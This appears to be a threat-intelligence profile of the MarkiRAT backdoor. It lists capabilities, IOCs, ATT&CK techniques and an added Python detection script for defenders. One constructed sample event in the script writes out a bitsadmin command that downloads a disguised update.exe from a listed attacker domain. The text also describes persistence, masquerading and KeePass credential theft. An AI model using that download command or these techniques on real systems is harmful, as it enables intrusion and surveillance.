MarkiRAT
MarkiRAT is a custom remote access trojan/backdoor associated with the Iran-linked TAG-182 activity cluster and also reported in connection with the Iran-linked Ferocious Kitten threat group. It has been used in cyber-surveillance operations and provides broad collection and remote access capabilities.

Reported functionality includes: retrieving the victim username; capturing all keystrokes; capturing clipboard contents; taking screenshots, initially saved as "scr.jpg"; searching the filesystem for targeted file types and credential stores; gathering information from the KeePass password manager; checking for the Telegram installation directory by enumerating files on disk; checking running processes for Kaspersky and Bitdefender antivirus products; and calling the GetKeyboardLayout API to determine whether the compromised host's keyboard is set to Persian. MarkiRAT can execute arbitrary or remote commands, stores collected data locally in a created .nfo file, and exfiltrates the staged data over its HTTP(S) C2 channel.

The malware has masqueraded as update.exe and svehost.exe and has also mimicked legitimate Telegram and Chrome files; one listed path is C:\Users\Public\AppData\Windows\svehost.exe. Supporting detection content references BITSAdmin-based payload downloads tied to MarkiRAT, including use of the /i.php?u= and /uploadx.php endpoints, and notes delivery under filenames such as YEPlayer.dll, YEMPlayer.zip, YEMPlayer.msi, Pis2rayVPN.msi, Pis2rayVPN.zip, and Pis2rayN.dll.
Observed infrastructure and indicators mentioned in the content include domains yeplayer[.]store, yemplayer[.]site, pis2ray[.]online, microsoft[.]comi-site[.]website, microsotf[.]comi-site[.]website; IPs 45[.]86[.]162[.]197, 46[.]30[.]191[.]105, 46[.]30[.]191[.]123, 89[.]144[.]145[.]237, 89[.]144[.]145[.]239, and 212[.]83[.]61[.]198; and sample SHA-256 hashes 13440348516ccee839675f6ac908dd1724ce1d28f92af92fdc7938740d2b7ec5, bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b, and fa246327bed8fc5864827a8147b8b7aedb6246068259b8c97e82adb957315347.
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories (the identifier is not given here).
Groups observed using it
2 distinct threat actors attributed by public researchers: the TAG-182 activity cluster and Ferocious Kitten.
"TAG-182's malware scheme is likely one of the myriad tactics, techniques, and procedures (TTPs) used by these organizations..."
YARA: rule APT_IR_TAG182_MarkiRAT_2, description = "Track the main backdoor of TAG-182, MarkiRAT"
Sigma: title: MarkiRAT Malware Bitsadmin File Download; description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182.
Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S).
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution (3 techniques)
ATT&CK tags from the Sigma rule: attack.t1197 (BITS Jobs); attack.t1059.003 (Command and Scripting Interpreter: Windows Command Shell).
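The following Python is an added example, not code from this page, from TAG-182 reporting, or from the published YARA/Sigma rules. It approximates the Sigma logic described here (bitsadmin fetching from a remote URL) and additionally matches the domains, IPs, SHA-256 hashes, C2 paths, and masquerade filenames listed on this page. The event field names (Image, CommandLine, SHA256) are an assumption modelled loosely on Sysmon process-creation events, the sample events are constructed rather than real telemetry, and the defanged indicators from the page are refanged for matching.

```python
"""Constructed detection logic for MarkiRAT-style BITSAdmin downloads and IOC matches.

Added example for illustration only; not the page's own code and not the published
YARA/Sigma rules. Field names (Image, CommandLine, SHA256) are an assumption loosely
based on Sysmon process-creation events; SAMPLE_EVENTS below are constructed.
"""
import re

# Indicators as listed on this page (defanged in the source; refanged here for matching).
MARKIRAT_DOMAINS = {
    "yeplayer.store", "yemplayer.site", "pis2ray.online",
    "microsoft.comi-site.website", "microsotf.comi-site.website",
}
MARKIRAT_IPS = {
    "45.86.162.197", "46.30.191.105", "46.30.191.123",
    "89.144.145.237", "89.144.145.239", "212.83.61.198",
}
MARKIRAT_SHA256 = {
    "13440348516ccee839675f6ac908dd1724ce1d28f92af92fdc7938740d2b7ec5",
    "bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b",
    "fa246327bed8fc5864827a8147b8b7aedb6246068259b8c97e82adb957315347",
}
# URL paths the detection content ties to MarkiRAT's BITSAdmin download / upload traffic.
MARKIRAT_C2_PATHS = ("/i.php?u=", "/uploadx.php")
# Filenames the malware has masqueraded as or been delivered under. These are low fidelity
# on their own, so they are only flagged when the image sits under C:\Users\Public\.
MARKIRAT_FILENAMES = {
    "update.exe", "svehost.exe", "yeplayer.dll", "yemplayer.zip", "yemplayer.msi",
    "pis2rayvpn.msi", "pis2rayvpn.zip", "pis2rayn.dll",
}

URL_RE = re.compile(r"https?://([^/\s:]+)(?::\d+)?(/\S*)?", re.IGNORECASE)


def _basename(path):
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return the sorted list of detection labels triggered by one process-creation event."""
    hits = set()
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    sha256 = event.get("SHA256", "").lower()
    name = _basename(image)

    # Sigma-style condition: bitsadmin pulling from a remote URL. Extra labels are added
    # when the host or the path matches MarkiRAT infrastructure or endpoints.
    if name == "bitsadmin.exe":
        for m in URL_RE.finditer(cmdline):
            hits.add("bitsadmin_remote_download")
            host, path = m.group(1).lower(), (m.group(2) or "")
            if host in MARKIRAT_DOMAINS or host in MARKIRAT_IPS:
                hits.add("markirat_infra")
            if path.startswith(MARKIRAT_C2_PATHS):
                hits.add("markirat_c2_path")

    if sha256 in MARKIRAT_SHA256:
        hits.add("markirat_hash")

    if image.lower().startswith("c:\\users\\public\\") and name in MARKIRAT_FILENAMES:
        hits.add("markirat_public_path")

    return sorted(hits)


def scan(events):
    """Return (index, labels) for every event that triggers at least one label."""
    return [(i, labels) for i, e in enumerate(events) if (labels := analyze_event(e))]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {  # MarkiRAT-style staging: bitsadmin fetching from a listed domain via /i.php?u=
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "CommandLine": r"bitsadmin /transfer job1 /download /priority high "
                       r"http://yeplayer.store/i.php?u=1 C:\Users\Public\update.exe",
        "SHA256": "",
    },
    {  # Ordinary use of bitsadmin against an unrelated host: noisy, but not MarkiRAT
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "CommandLine": r"bitsadmin /transfer patch /download "
                       r"https://updates.example.net/kb.msu C:\Temp\kb.msu",
        "SHA256": "",
    },
    {  # The listed svehost.exe path carrying one of the listed sample hashes
        "Image": r"C:\Users\Public\AppData\Windows\svehost.exe",
        "CommandLine": r"C:\Users\Public\AppData\Windows\svehost.exe",
        "SHA256": "13440348516ccee839675f6ac908dd1724ce1d28f92af92fdc7938740d2b7ec5",
    },
    {  # Benign browser launch: no labels
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"',
        "SHA256": "",
    },
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS):
        print(idx, labels)
```

The plain bitsadmin_remote_download label reproduces the Sigma rule's scope and will fire on legitimate administration; the markirat_infra and markirat_c2_path labels are what raise an alert to family-specific fidelity, so triage on those first and treat the filename match as corroboration only.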
Persistence (3 techniques)
The Sigma rule "MarkiRAT Malware Bitsadmin File Download" (Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182) is tagged attack.t1197 (BITS Jobs), which ATT&CK also files under Persistence: BITS transfer jobs survive reboots and can run a command when the transfer completes.
Registry Run keys / Startup folder: the content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder; examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders. For MarkiRAT specifically, reporting notes persistence via the Startup folder and via execution-flow hijacking: planting alongside legitimate Telegram/Chrome installations and modifying their shortcuts.
Privilege Escalation (2 techniques)
ATT&CK files Boot or Logon Autostart Execution under both Persistence and Privilege Escalation, so the same Run/RunOnce key and Startup folder entries described above are counted here as well.
Stealth (3 techniques)
Masquerading: MarkiRAT has masqueraded as update.exe and svehost.exe (a look-alike of the legitimate svchost.exe name) and has mimicked legitimate Telegram and Chrome files. The generic ATT&CK illustration carried here: during the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
Credential Access (3 techniques)
Credentials from password stores: MarkiRAT gathers information from the KeePass password manager and searches the filesystem for credential stores, including KeePass .kdbx databases. ATT&CK examples of the same technique cited alongside it:
"Fox Kitten has used scripts to access credential information from the KeePass database. Indrik Spider has accessed and exported passwords from password managers. Proton gathers credentials in files for 1password. TrickBot can steal passwords from the KeePass open source password manager."
"LAPSUS$ has accessed local password managers and databases to obtain further credentials from a compromised network. Scattered Spider has searched for credentials in password vaults and Privileged Access Management (PAM) solutions including HashiCorp Vault. Storm-0501 has stolen credentials contained in the password manager Keepass by utilizing Find-KeePassConfig.ps1."
Discovery (6 techniques)
Account discovery: the content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts. MarkiRAT retrieves the victim username.
Process discovery: the content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems. MarkiRAT checks running processes for Kaspersky and Bitdefender products.
System information discovery: the content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
File and directory discovery: the content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands"). MarkiRAT enumerates files on disk to locate the Telegram installation directory and searches for targeted file types and credential stores.
Software discovery: "Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."
System language discovery: MarkiRAT uses GetKeyboardLayout to determine whether the host keyboard is set to Persian, the same kind of language check other families use as a targeting gate: "Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities... Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian... Clop has checked the keyboard language using the GetKeyboardLayout() function... Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage."
Collection (5 techniques)
Input and clipboard capture: MarkiRAT captures all keystrokes and clipboard contents.
Local data staging: the content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration. MarkiRAT writes collected data to a created .nfo file and initially saves screenshots as "scr.jpg" before exfiltration.
Screen capture: "Agent Tesla can capture screenshots of the victim's desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop".
Command and Control (1 technique)
HTTP(S)-based C2 with staged exfiltration. The detection content names /i.php?u= (payload download via BITSAdmin) and /uploadx.php (data upload) as the endpoints.
IOCs tracked for this family
56 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains, and DNS infrastructure; file hashes (MD5, SHA-1, SHA-256) from samples and reports; and other indicator types observed in public reporting. The domains, IPs, and SHA-256 hashes reproduced on this page are listed in the overview above.
Recent activity
27 sources tracked across advisories, community write-ups, and news.
MarkiRAT is described as the main backdoor used by TAG-182. It uses BITSAdmin to download payloads from remote URLs, communicates with C2 endpoints via /i.php and /uploadx.php, uploads data, and includes screenshot-capture functionality for surveillance.
Custom espionage implant/RAT used by Ferocious Kitten for surveillance and data theft: keylogging and clipboard capture, screenshots, file and directory discovery, targeted collection of sensitive file types (including credential/key store formats like KeePass .kdbx), remote command execution, and HTTP(S)-based C2 with staged exfiltration. Also uses persistence via startup folder and execution-flow hijacking by planting alongside legitimate apps (e.g., Telegram/Chrome) and modifying shortcuts.
Enterprise New Software: ... MarkiRAT
RAT used for dissident surveillance: keylogging, clipboard capture, file upload/download, and arbitrary command execution; traced back to at least 2015; variants hijack Telegram/Chrome execution for persistence.